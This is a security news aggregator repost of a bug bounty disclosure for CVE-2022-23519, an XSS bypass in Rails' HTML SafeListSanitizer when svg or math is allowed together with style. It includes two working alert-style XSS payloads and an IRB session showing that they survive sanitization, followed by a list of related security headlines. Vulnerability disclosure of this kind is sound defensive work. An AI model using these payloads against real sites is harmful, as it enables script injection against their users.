

🕵️ Internet Bug Bounty: CVE-2022-23519: Rails::Html::SafeListSanitizer vulnerable to XSS when certain tags are allowed (math+style || svg+style)


News section: 🕵️ Security vulnerabilities
🔗 Source: vulners.com


The following is from: https://hackerone.com/reports/1656627

Intro

The Rails HTML sanitizer allows setting certain combinations of tags in its allow list that are not properly handled. Similar to report 1530898, which identified the combination select and style as vulnerable, my fuzz testing from today suggests that svg and style as well as math and style also allow XSS. The following are PoCs for each of these allow lists:

- svg and style: `<svg><style><script>alert(1)</script></style></svg>`
- math and style: `<math><style><img src=x onerror=alert(1)></style></math>`

See the following IRB session:

```
irb(main):016:0> require 'rails-html-sanitizer'
=> false
irb(main):017:0> Rails::Html::SafeListSanitizer.new.sanitize("<svg><style><script>alert(1)</script></style></svg>", tags: ["svg", "style"]).to_s
=> "<svg><style><script>alert(1)</script></style></svg>"
irb(main):018:0> Rails::Html::SafeListSanitizer.new.sanitize("<math><style><img src=x onerror=alert(1)></style></math>", tags: ["math", "style"]).to_s
=> "<math><style><img src=x onerror=alert(1)></style></math>"
irb(main):019:0> puts Rails::Html::Sanitizer::VERSION
1.4.3
=> nil
```

Sample Vulnerable Rails Application

To build a sample Rails application that is vulnerable, I've used the following Dockerfile:

```
FROM ruby:3.1.2
RUN apt-get update && apt-get install -y vim
WORKDIR /usr/src/app
RUN gem install rails && rails new myapp
WORKDIR /usr/src/app/myapp
COPY build-rails-app.sh ./build-rails-app.sh
RUN sh... ...
```

🕵️ Internet Bug Bounty: Rails ActionView sanitize helper bypass leading to XSS using SVG tag.


📈 38.68 points
🕵️ Security vulnerabilities

🕵️ Internet Bug Bounty: ReDoS (Rails::Html::PermitScrubber.scrub_attribute)


📈 35.75 points
🕵️ Security vulnerabilities

🕵️ Xbox bug could have allowed hackers to link gamer tags with players' emails


📈 32.77 points
🕵️ Hacking

🕵️ WordPress <= 5.2.3 - Stored XSS in Style Tags


📈 31.83 points
🕵️ Security vulnerabilities

🕵️ A way to create a stored XSS to inject Javascript into style tags


📈 31.83 points
🕵️ Security vulnerabilities

📰 XSS-LOADER - XSS Payload Generator / XSS Scanner / XSS Dork Finder


📈 30.32 points
📰 IT Security News

🕵️ Ruby on Rails 3.0/4.0 rails-html-sanitizer Cross Site Scripting


📈 29.3 points
🕵️ Security vulnerabilities

🕵️ Piwigo up to 2.9.2 Administration Panel admin/tags.php tags SQL Injection


📈 28.8 points
🕵️ Security vulnerabilities

📰 LinkDesk Smart Tags unveiled: stylish NFC tags with app integration


📈 28.8 points
📰 IT News

🕵️ Internet Bug Bounty: Undici ProxyAgent vulnerable to MITM


📈 28.21 points
🕵️ Security vulnerabilities

🎥 [Bug Bounty Hacker] Yahoo Bug Bounty Program 2016 - Sender Spoofing Vulnerability


📈 28.14 points
🎥 IT Security Video

🎥 Ebay Inc Bug Bounty Magento Commerce Bug Bounty - Persistent Cross Site Scripting Vulnerability


📈 28.14 points
🎥 IT Security Video

📰 Naked Security Live – When is a bug bounty not a bug bounty?


📈 28.14 points
📰 IT Security News

🕵️ Bug Bounty Platforms [Best Choices For a Bug Bounty Program]


📈 28.14 points
🕵️ Hacking

🕵️ Bug Bounty Benefits | Why You Need a Bug Bounty Program


📈 28.14 points
🕵️ Hacking
